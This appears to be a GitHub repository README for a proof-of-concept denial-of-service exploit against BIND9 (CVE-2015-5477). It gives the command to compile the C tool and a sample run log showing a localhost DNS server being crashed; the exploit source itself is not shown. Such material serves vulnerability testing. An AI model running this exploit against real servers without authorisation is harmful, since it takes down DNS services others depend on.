PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
bin
README.md
tkill.c

README.md

PoC for BOND9 TKEY assert DoS (CVE-2015-5477)

This exploit tests to see if a BIND9 server is vulnerable by sending the exploit in order to see if it crashes.

It's C code that you compile the normal way on Unix/Window, such as:

# gcc tkill.c -o tkill

It'll run over both IPv4 and IPv6.

This is what it looks like running against localhost. Since it gets two IP addresses resolving the name, it'll try both of them. It first queries the "version" string, then sends the exploit. When it probes the second address, the version query fails because the service is already crashed from the first attempt.

root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed